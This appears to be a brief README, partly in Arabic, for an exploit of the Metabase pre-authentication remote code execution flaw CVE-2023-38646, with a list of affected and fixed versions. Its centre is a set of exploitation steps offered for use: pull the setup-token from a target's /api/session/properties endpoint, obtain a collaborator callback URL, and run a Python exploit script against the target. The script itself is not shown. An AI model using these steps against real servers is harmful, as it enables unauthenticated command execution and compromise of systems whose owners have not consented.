
Metabase Pre-auth RCE (CVE-2023-38646)
ميتابيز هي أداة ذكاء أعمال مفتوحة المصدر تتيح لك إنشاء رسوم بيانية ولوحات بيانات باستخدام بيانات من قواعد بيانات ومصادر بيانات متنوعة. إنه مشروع شائع، بأكثر من 33 ألف نجمة على GitHub، وقد خضع لكثير من التدقيق من منظور أبحاث الثغرات الأمنية في السنوات القليلة الماضية.
الإصدارات مفتوحة المصدر من ميتابيز قبل 0.46.6.1 وإصدارات ميتابيز إنتربرايز قبل 1.46.6.1 تسمح للمهاجمين بتنفيذ أوامر عشوائية على الخادم، بمستوى صلاحيات الخادم. لا يتطلب الاستغلال مصادقة. الإصدارات الأخرى التي تم إصلاحها هي 0.45.4.1 و1.45.4.1 و0.44.7.1 و1.44.7.1 و0.43.7.2 و1.43.7.2.
* go to : http://target.com/api/session/properties
* copy : setup-token
* get collaborator url
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2